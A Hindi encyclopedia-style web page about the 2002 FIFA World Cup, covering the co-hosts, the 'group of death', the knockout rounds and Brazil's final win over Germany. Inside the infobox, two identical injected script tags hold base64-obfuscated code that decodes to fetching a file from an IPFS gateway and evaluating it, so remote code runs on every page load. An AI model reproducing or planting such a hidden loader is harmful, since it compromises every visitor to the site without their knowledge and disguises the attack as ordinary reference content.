विश्व कप फ़ुटबॉल 2002

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
विश्व कप फ़ुटबॉल 2002
विश्व कप फ़ुटबॉल 2002
विवरण 'फ़ीफ़ा विश्व कप' का आयोजन 'फ़ीफ़ा' (फ़ेडरेशन ऑफ़ इंटरनेशनल फ़ुटबॉल एसोसिएशन) द्वारा कराया जाता है। सत्रहवाँ विश्व कप फ़ुटबॉल वर्ष 2002 में खेला गया था, जिसकी मेज़बानी दक्षिण कोरिया तथा जापान ने संयुक्त रूप से की थी।
आयोजन स्थल दक्षिण कोरिया तथा जापान
वर्ष 2002
तिथि 31 मई से 30 जून
कुल देश 32
फ़ाइनल ब्राज़ील तथा जर्मनी
कुल मैच 64
कुल गोल 161
दर्शक 2,705,197
संबंधित लेख ब्राज़ील ने जर्मनी को हराकर पाँचवी बार विश्व कप का ख़िताब अपने नाम किया। इस विश्व कप में रोनाल्डो ने आठ गोल किये थे तथा प्लेयर ऑफ़ द टूर्नामेंट का ख़िताब भी पाया।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

विश्व कप फ़ुटबॉल 2002 अथवा फ़ीफ़ा विश्व कप 2002 (अंग्रेज़ी: FIFA World Cup 2002) वर्ष 2002 में विश्व कप फ़ुटबॉल की मेज़बानी दक्षिण कोरिया तथा जापान ने संयुक्त रूप की थी, जिसमें 32 देशों की टीमें शामिल थी। पहली बार ऐसा हुआ कि दो देशों ने मिल कर विश्व कप की मेज़बानी की। इस कारण ऐसा पहली बार हुआ कि तीन चैम्पियन देशों फ़्रांस और मेज़बान देश दक्षिण कोरिया के साथ-साथ जापान को विश्व कप में सीधे प्रवेश मिला। ब्राज़ील की टीम ने जर्मनी को हराकर अपने देश को पाँचवी बार विश्व कप का ख़िताब दिलाया। इस दौड़ में उनके साथी खिलाड़ी रिवाल्डो ने भी उन्हें अच्छी चुनौती दी। 1970 के बाद ब्राज़ील ऐसी टीम बनी, जिसने विश्व कप में अपने सभी मैच जीते। 1970 में भी ब्राज़ील ने ही यह कारनामा दिखाया था। इससे पहले उरुग्वे ने 1930 में और इटली ने 1938 में यह सफलता हासिल की थी।[1]

ग्रुप ऑफ़ डेथ

इस विश्व कप की शुरुआत धमाकेदार अंदाज़ में हुई। जब सेनेगल ने चैम्पियन फ़्रांस को हराकर सनसनी फैला दी। फ़्रांस की शुरुआत ऐसी ख़राब हुई कि डेनमार्क ने 3-0 से हराकर उसे प्रतियोगिता से ही बाहर कर दिया। पहले दौर से अर्जेंटीना भी बाहर हो गया, लेकिन उसका ग्रुप काफ़ी कठिन था। उस ग्रुप को ग्रुप ऑफ़ डेथ का भी नाम दिया गया था। इस ग्रुप में इंग्लैंड, स्वीडन, अर्जेंटीना और नाइजीरिया की टीमें शामिल थी। दूसरे दौर में स्वीडन और इंग्लैंड को पहुँचने का मौक़ा मिला। मेज़बान जापान और दक्षिण कोरिया की टीमें भी दूसरे दौर में पहुँचने में कामयाब हुईं।

क्वार्टर फ़ाइनल

क्वार्टर फ़ाइनल में ब्राज़ील, सेनेगल, इंग्लैंड, तुर्की, स्पेन, दक्षिण कोरिया, जर्मनी और अमरीका की टीमों को पहुँचने का सौभाग्य मिला। क्वार्टर फ़ाइनल में ब्राज़ील ने इंग्लैंड को 2-1 से हराया तो तुर्की ने सेनेगल को हराकर बाहर किया। दक्षिण कोरिया ने पेनल्टी शूट आउट में स्पेन को चलता किया तो जर्मनी सिर्फ़ एक गोल के अंतर से ही अमरीका को हरा पाया।

सेमीफ़ाइनल

सेमीफ़ाइनल में ब्राज़ील ने तुर्की को हराया तो जर्मनी के हाथों दक्षिण कोरिया की हार हुई।

फ़ाइनल

फ़ाइनल मैच में ब्राज़ील तथा जर्मनी ने अपने धमाकेदार प्रदर्शन से प्रवेश किया। पिछले विश्व कप की ख़राब यादों को भूलते हुए ब्राज़ील के स्टार स्ट्राइकर रोनाल्डो ने फ़ाइनल में अपने पैर का जादू दिखाया तथा बेहतरीन खेल की बदौलत ब्राज़ील ने जर्मनी को हराकर पाँचवीं बार विश्व कप का ख़िताब जीता। रोनाल्डो ने फ़ाइनल के दोनों गोल मारे थे। रोनाल्डो ने इस विश्व कप में आठ गोल किये थे तथा प्लेयर ऑफ़ द टूर्नामेंट का ख़िताब भी पाया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. विश्व कप फ़ुटबॉल (हिन्दी) bbc.com। अभिगमन तिथि: 9 अगस्त, 2016।

बाहरी कड़ियाँ

संबंधित लेख